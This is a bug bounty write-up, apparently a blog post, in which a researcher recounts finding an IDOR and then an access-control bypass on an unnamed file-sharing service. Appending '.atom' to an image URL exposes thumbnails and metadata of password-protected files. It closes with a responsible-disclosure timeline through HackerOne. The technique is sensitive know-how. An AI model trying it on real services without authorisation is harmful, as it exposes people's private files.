How I was Able to see someone’s all private files with a single file share link through Atom feed & Never Give Up #togetherwehitharder HackerOne
So I just Go through @google.com and using some dork I found some programs but I don’t want to test them then I goto twitter and searched for #bugbounty #bounty and got few program from @twitter , one guy posted he got some 💵$$$ for report a security issues.
So without wasting my time I go for hunting that site but before I get started I crawl to the whole website to see the functionality (how it works) and saw that there are many clients of the website and most of his client was of HackerOne , but two program are strange for me . so I Decided to go to there website for hunting and got some vulnerabilities and I contact them through mail.
Next Day I got reply from them
“Thanks for Reporting the issue , can you please submit the Vulnerabilities through hackerone as we are running Private program there .
Immediately I replied
“Yes I have a profile in HackerOne and here are my details for invitation”
After getting the Invite I see the thanks page there was HackerOne Top #100 Researchers so I think that there is no more chance to get more Vulnerability. But after spending some hours I did not got more issues
then was thinking to give up and move on but HackerOne #togetwehitharder reminds me to get harder 😉
so again I started hunting and this time I am using the website simply as there users and after some hours I came back in hunting .
I Got 1 IDOR (me like :- woot woot , happiness 😅 overloaded and become crazy 😍
Next day the report was marked As “Informative” Then I was like hopeless 😫
Then I said lets look on POC Image (Request/ Response) 😉
In response I got some juicy info with URL of Image with extension .atom 🤔
Quickly i open those URL but all are Page Not Found.
Then I google “what is atom for files”
I got one like https://fileinfo.com/extension/atom
on that i find my answer which helped me little bit “XML-based atom”
Again I Google XML-based atom I got https://validator.w3.org/feed/docs/atom.html
After reading the whole post I get to Know “what is atom feed”
What is Atom?
Atom is the name of an XML-based Web content and metadata syndication format, and an application-level protocol for publishing and editing Web resources belonging to periodically updated websites.
All Atom feeds must be well-formed XML documents, and are identified with the
application/atom+xml media type.
Then suddenly I think that let me open the file with .atom extension
Example :- https://example.com/folder/image_token.atom
after opening the url I was like
“wow , woot woot ” 😂 😘
Information Disclosed :- content , media;content , media:thumbnail
you can get lots of information like files thumbnail so without password files can be access and metadeta of file can not be seen if the image is password protected which is hidden by default but by adding .atom extension in the image url you can see all the juicy information
Immediately I report the vulnerability to the program
Next day I got replied with Reward (Bounty on triaged)
6th September 2017 Reported
7th September 2017 Got Response from team
7th September 2017 Triaged
7th September 2017 Rewarded Bounty (cool bounty)
13th September Resolved
13th September but they have not fixed so I replied
13th September team replied
14th September again team replied And given me some “more information” Regarding Patch.
14th September fixed
10th October Request for blog post
12th October content for blog provided to team
13th October Permission Granted For Blog Post
I would like to Thank HackerOne awesome platform for Hackers (White Hat)
for https://medium.com/@arbazhussain/10-rules-of-bug-bounty-65082473ab8c which Reminds me Don’t Give up Easily , Give Time on program for many days .